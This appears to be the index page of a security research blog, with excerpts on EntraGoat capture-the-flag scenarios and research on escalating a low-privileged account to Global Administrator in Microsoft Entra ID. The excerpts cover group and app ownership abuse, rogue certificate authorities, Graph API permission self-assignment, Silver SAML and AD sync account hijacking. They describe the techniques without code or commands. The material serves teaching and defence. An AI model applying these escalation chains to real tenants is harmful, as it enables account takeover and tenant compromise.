Tomer Nahum’s Research Blog

Group MemberShipwreck – Sailed into Admin Waters EntraGoat Scenario 3 demonstrates how legitimate Entra ID administrative features - group ownership, role-assignable groups, and service principal management can be chained into an unintended privilege escalation path from a low-privileged user to Global Administrator. The attacker begins with a compromised IT support account that owns several groups, including one that is role-assignable with the Application Administrator role. By adding themselves to this group, the attacker inherits the role and gets broad control over applications and service principals across the tenant. ...

Certificate Bypass Authority–Root Access Granted EntraGoat Scenario 6 details a privilege escalation technique in Microsoft Entra ID where the player begins with low-privileged credentials and achieves Global Administrator access by chaining misconfigured service principals, over-permissive app roles, and legitimate certificate-based authentication (CBA) functionality. Using leaked credentials from a legacy service principal, the attacker pivots through owned identity, abuses privileged permissions to modify tenant-wide settings, enables CBA via a user eligible for Privileged Identity Management (PIM) for Groups, and uploads a rogue root certificate authority. This results in passwordless, MFA-compliant impersonation of a Global Admin—enabling complete tenant takeover and persistence. ...

Graph Me the Crown (and Roles) EntraGoat Scenario 2 demonstrates how certificate-based authentication tied to an existing service principal and overprivileged application permissions can lead to Global Administrator compromise. The attacker starts with access to a leaked certificate that was exposed through continuous integration/continuous delivery (CI/CD) pipeline artifacts. The certificate is valid for a service principal that has the AppRoleAssignment.ReadWrite.All application permission. By authenticating in an app-only context, the attacker abuses this permission to assign another permission, RoleManagement.ReadWrite.Directory, to the same service principal. This enables the service principal to self-assign any directory role (including Global Administrator) to any service principal it wishes. Finally, the attacker resets the admin’s password and retrieves the scenario flag. ...

Misowned and dangerous: An Owner’s Manual to Global Admin We begin our EntraGoat use examples with Scenario 1, which we’ve named Misowned and Dangerous: An Owner’s Manual to Global Admin. This practical exercise showcases how legitimate application ownership in Microsoft Entra ID can be leveraged to escalate privileges and compromise a Global Administrator account—enabling complete tenant takeover. Starting with a compromised low-privileged user account, the attacker discovers ownership over an enterprise application (service principal) that is assigned a privileged role. ...

Getting Started with EntraGoat: Breaking Entra ID the Smart Way EntraGoat is a deliberately vulnerable lab that simulates real-world identity misconfigurations in Microsoft Entra ID. Whether you’re a red teamer, blue teamer, or just curious about identity attacks, this guide will walk you through how to set up EntraGoat, launch your first challenge, and start capturing flags like a pro. What is EntraGoat? Imagine a playground where you can: Escalate a user to Global Admin Chain permissions via the Graph API Abuse misconfigured apps and service principals Activate privileged roles to reset global admin’s MFA Simulate attacks without endangering production environments That’s exactly what EntraGoat offers: a CTF-style platform for identity exploitation learning in the cloud (Figure 1). ...

What Is EntraGoat? A Deliberately Vulnerable Microsoft Entra ID Lab Meet EntraGoat: Figure 1 shows a preview of what you’re getting into. Figure 1. EntraGoat start screen Why do identity security defenders need EntraGoat? Modern Entra ID environments are a goldmine for attackers. Over-permissioned apps, stale group assignments, and mismanaged service principals offer more than enough to escalate to Global Administrator with a few clever moves. EntraGoat reproduces these attack paths inside your own test tenant, giving you a safe and reproducible playground to learn, teach, test, or validate: ...

Key Findings Golden SAML, an attack technique that exploits the SAML single sign-on protocol, was used as a post-breach exploit, compounding the devastating SolarWinds attack of 2020, one of the largest breaches of the 21st century. The supply chain SolarWinds attack affected thousands of organizations around the world, including the US Government. Attackers deployed malicious code into the company’s Orion IT management and monitoring software. In the wake of this attack, CISA and cybersecurity experts encouraged organizations with hybrid identity environments to move SAML authentication to a cloud identity system such as Entra ID. Tomer Nahum and Eric Woodruff have discovered a new application of Golden SAML, one that can be exploited even in organizations that have followed previous security recommendations meant to defend against Golden SAML. The new attack technique, dubbed Silver SAML, enables the exploitation of SAML to launch attacks from an identity provider like Entra ID against applications configured to use it for authentication, such as Salesforce. To our knowledge, no attacks using Silver SAML have been reported. We rate this vulnerability as Moderate, with a potential increase to Severe. Golden SAML is a known attack technique discovered by CyberArk and published by Shaked Reiner. (Remember Golden SAML attack that compounded the damage from the SolarWinds cyberattack, aka Solorigate?) For years, Golden SAML has been known for its extraction of signing certificates from Active Directory Federation Services (AD FS) and its use of those certificates to forge SAML authentication responses. Today, we present a new application of Golden SAML—in Microsoft Entra ID and without the use of AD FS. Meet Silver SAML. ...

In Dirk-Jan’s talk at Troopers 19 (I’m in your cloud, reading everyone’s emails - hacking Azure AD via Active Directory), he discussed an issue he discovered that allowed a method (SMTP matching) to synchronize Active Directory (AD) users up to Azure AD to hijack unsynchronized accounts. He stated that Microsoft blocked the ability to synchronize on-prem accounts which had active assignments to administrative roles within Azure, but this sparked the following research. This blog talks about how anyone with account creation privileges in an AD environment can modify the password of an Azure AD user which, with some pre-requisites, can obtain privileged access via Eligible role assignments. ...